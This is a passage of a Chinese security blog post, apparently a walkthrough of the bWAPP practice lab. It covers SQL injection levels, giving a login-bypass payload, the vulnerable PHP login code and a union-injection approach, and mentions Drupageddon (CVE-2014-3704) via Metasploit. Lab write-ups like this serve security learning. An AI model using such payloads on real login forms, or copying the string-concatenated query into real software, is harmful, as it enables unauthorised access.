<h1 id="SQL-Injection-Login-Form-Hero"><a href="#SQL-Injection-Login-Form-Hero" class="headerlink" title="SQL Injection (Login Form/Hero)"></a>SQL Injection (Login Form/Hero)</h1><p>一个登陆框，用万能密码即可</p>
<p>login=1’ or ‘1’=’1’ # &amp;password=2&amp;form=submit</p>
<h1 id="SQL-Injection-Login-Form-User"><a href="#SQL-Injection-Login-Form-User" class="headerlink" title="SQL Injection (Login Form/User)"></a>SQL Injection (Login Form/User)</h1><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">    if(isset($_POST[&quot;form&quot;]))</span><br><span class="line">    &#123;</span><br><span class="line"></span><br><span class="line">        $login &#x3D; $_POST[&quot;login&quot;];</span><br><span class="line">        $login &#x3D; sqli($login);</span><br><span class="line"></span><br><span class="line">        $password &#x3D; $_POST[&quot;password&quot;];</span><br><span class="line">        $password &#x3D; sqli($password);</span><br><span class="line">        $password &#x3D; hash(&quot;sha1&quot;, $password, false);</span><br><span class="line"></span><br><span class="line">        $sql &#x3D; &quot;SELECT * FROM users WHERE login &#x3D; &#39;&quot; . $login . &quot;&#39;&quot;;</span><br><span class="line"></span><br><span class="line">        &#x2F;&#x2F; echo $sql;</span><br><span class="line"></span><br><span class="line">        $recordset &#x3D; mysql_query($sql, $link);</span><br><span class="line"></span><br><span class="line">        if(!$recordset)</span><br><span class="line">        &#123;</span><br><span class="line"></span><br><span class="line">            die(&quot;Error: &quot; . mysql_error());</span><br><span class="line"></span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        else</span><br><span class="line">        &#123;</span><br><span class="line"></span><br><span class="line">            $row &#x3D; mysql_fetch_array($recordset);</span><br><span class="line"></span><br><span class="line">            if($row[&quot;login&quot;] &amp;&amp; $password &#x3D;&#x3D; $row[&quot;password&quot;])</span><br><span class="line">            &#123;</span><br><span class="line"></span><br><span class="line">                &#x2F;&#x2F; $message &#x3D; &quot;&lt;font color&#x3D;\&quot;green\&quot;&gt;Welcome &quot; . ucwords($row[&quot;login&quot;]) . &quot;...&lt;&#x2F;font&gt;&quot;;</span><br><span class="line">                $message &#x3D;  &quot;&lt;p&gt;Welcome &lt;b&gt;&quot; . ucwords($row[&quot;login&quot;]) . &quot;&lt;&#x2F;b&gt;, how are you today?&lt;&#x2F;p&gt;&lt;p&gt;Your secret: &lt;b&gt;&quot; . ucwords($row[&quot;secret&quot;]) . &quot;&lt;&#x2F;b&gt;&lt;&#x2F;p&gt;&quot;;</span><br><span class="line">                &#x2F;&#x2F; $message &#x3D; $row[&quot;login&quot;];</span><br><span class="line"></span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">            else</span><br><span class="line">            &#123;</span><br><span class="line"></span><br><span class="line">                $message &#x3D; &quot;&lt;font color&#x3D;\&quot;red\&quot;&gt;Invalid credentials!&lt;&#x2F;font&gt;&quot;;</span><br><span class="line"></span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        mysql_close($link);</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    echo $message;</span><br></pre></td></tr></table></figure>
<p>这里登陆的逻辑是将通过用户名查询出的密码，与用户输入的密码通过sha1加密后的值进行比较。</p>
<p>所以我们需要现在正确的密码进行sha1加密。</p>
<p><code>6885858486f31043e5839c735d99457f045affd0</code></p>
<p>然后通过联合注入，测试出密码所在的位置</p>
<p><img src="../images/bWapp%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95-A1/image-20210206153610349.png" alt="image-20210206153610349"></p>
<p>可以看到，密码字段的位置是第三个，2和5回回显出来。可以继续通过2和5进行注入</p>
<h1 id="SQL-Injection-SQLite"><a href="#SQL-Injection-SQLite" class="headerlink" title="SQL Injection (SQLite)"></a>SQL Injection (SQLite)</h1><p><img src="../images/bWapp%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95-A1/image-20210206153800802.png" alt="image-20210206153800802"></p>
<h1 id="Drupal-SQL-Injection-Drupageddon"><a href="#Drupal-SQL-Injection-Drupageddon" class="headerlink" title="Drupal SQL Injection (Drupageddon)"></a>Drupal SQL Injection (Drupageddon)</h1><p>CVE-2014-3704</p>
<p>直接用msf就可</p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/web/" rel="tag"># web</a>
              <a href="/tags/%E9%9D%B6%E5%9C%BA/" rel="tag"># 靶场</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2021/01/07/XXE/" rel="prev" title="XXE">
      <i class="fa fa-chevron-left"></i> XXE
    </a></div>
      <div class="post-nav-item"></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#HTML-Injection-Reflected-GET"><span class="nav-number">1.</span> <span class="nav-text">HTML Injection - Reflected (GET)</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#HTML-Injection-Reflected-POST"><span class="nav-number">2.</span> <span class="nav-text">HTML Injection - Reflected (POST)</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#HTML-Injection-Reflected-URL"><span class="nav-number">3.</span> <span class="nav-text">HTML Injection - Reflected (URL)</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#HTML-Injection-Stored-Blog"><span class="nav-number">4.</span> <span class="nav-text">HTML Injection - Stored (Blog)</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#iFrame-Injection"><span class="nav-number">5.</span> <span class="nav-text">iFrame Injection</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#OS-Command-Injection"><span class="nav-number">6.</span> <span class="nav-text">OS Command Injection</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#OS-Command-Injection-Blind"><span class="nav-number">7.</span> <span class="nav-text">OS Command Injection - Blind</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#PHP-Code-Injection"><span class="nav-number">8.</span> <span class="nav-text">PHP Code Injection</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Server-Side-Includes-SSI-Injection"><span class="nav-number">9.</span> <span class="nav-text">Server-Side Includes (SSI) Injection</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#SQL-Injection-GET-Search"><span class="nav-number">10.</span> <span class="nav-text">SQL Injection (GET&#x2F;Search)</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#SQL-Injection-GET-Select"><span class="nav-number">11.</span> <span class="nav-text">SQL Injection (GET&#x2F;Select)</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#SQL-Injection-POST-Search"><span class="nav-number">12.</span> <span class="nav-text">SQL Injection (POST&#x2F;Search)</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#SQL-Injection-POST-Select"><span class="nav-number">13.</span> <span class="nav-text">SQL Injection (POST&#x2F;Select)</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#SQL-Injection-AJAX-JSON-jQuery"><span class="nav-number">14.</span> <span class="nav-text">SQL Injection (AJAX&#x2F;JSON&#x2F;jQuery)</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#SQL-Injection-CAPTCHA"><span class="nav-number">15.</span> <span class="nav-text">SQL Injection (CAPTCHA)</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#SQL-Injection-Login-Form-Hero"><span class="nav-number">16.</span> <span class="nav-text">SQL Injection (Login Form&#x2F;Hero)</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#SQL-Injection-Login-Form-User"><span class="nav-number">17.</span> <span class="nav-text">SQL Injection (Login Form&#x2F;User)</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#SQL-Injection-SQLite"><span class="nav-number">18.</span> <span class="nav-text">SQL Injection (SQLite)</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Drupal-SQL-Injection-Drupageddon"><span class="nav-number">19.</span> <span class="nav-text">Drupal SQL Injection (Drupageddon)</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Ya0a"
      src="/uploads/avatar.jpg">
  <p class="site-author-name" itemprop="name">Ya0a</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">16</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">4</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">8</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Ya0a</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script size="300" alpha="0.6" zIndex="-1" src="/lib/canvas-ribbon/canvas-ribbon.js"></script>
  <script src="/lib/anime.min.js"></script>

<script src="/js/utils.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
